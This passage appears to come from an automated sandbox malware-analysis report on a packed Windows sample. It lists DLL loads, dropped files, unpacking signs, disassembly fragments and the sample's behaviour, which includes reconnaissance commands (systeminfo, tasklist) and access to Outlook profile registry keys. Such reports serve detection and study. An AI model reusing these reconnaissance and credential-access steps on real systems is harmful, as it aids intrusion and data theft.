Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Users\user\Desktop\v173TV3V11.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\v173TV3V11.exe	Unpacked PE file: 0.2.v173TV3V11.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ruyohel:W;.tls:W;.rihogi:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Unpacked PE file: 5.2.bsjhhuh.400000.0.unpack .text:ER;.rdata:R;.data:W;.ruyohel:W;.tls:W;.rihogi:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Unpacked PE file: 6.2.C35.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.sazabah:W;.tls:W;.kisuva:W;.rsrc:R; vs .text:EW;

Source: C:\Users\user\AppData\Local\Temp\451E.exe

Code function: 9_2_00007FF763AF78EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,

9_2_00007FF763AF78EC

Source: v173TV3V11.exe	Static PE information: section name: .ruyohel
Source: v173TV3V11.exe	Static PE information: section name: .rihogi
Source: C35.exe.1.dr	Static PE information: section name: .sazabah
Source: C35.exe.1.dr	Static PE information: section name: .kisuva
Source: vejhhuh.1.dr	Static PE information: section name: .sazabah
Source: vejhhuh.1.dr	Static PE information: section name: .kisuva
Source: bsjhhuh.1.dr	Static PE information: section name: .ruyohel
Source: bsjhhuh.1.dr	Static PE information: section name: .rihogi

Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_004014D9 pushad ; ret	0_2_004014E9
Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_004031DB push eax; ret	0_2_004032AB
Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_006B1540 pushad ; ret	0_2_006B1550
Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_009135D2 push B63524ADh; retn 001Fh	0_2_00913609
Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_009140CF pushfd ; iretd	0_2_009140D0
Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_0091522F push esp; ret	0_2_00915231
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_004014D9 pushad ; ret	5_2_004014E9
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_004031DB push eax; ret	5_2_004032AB
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_006C1540 pushad ; ret	5_2_006C1550
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_006F4617 push esp; ret	5_2_006F4619
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_006F29BA push B63524ADh; retn 001Fh	5_2_006F29F1
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_006F34B7 pushfd ; iretd	5_2_006F34B8
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_0040100B push esi; ret	6_2_0040100C
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_0040280E push esp; ret	6_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_0040281F push esp; ret	6_2_004029C6
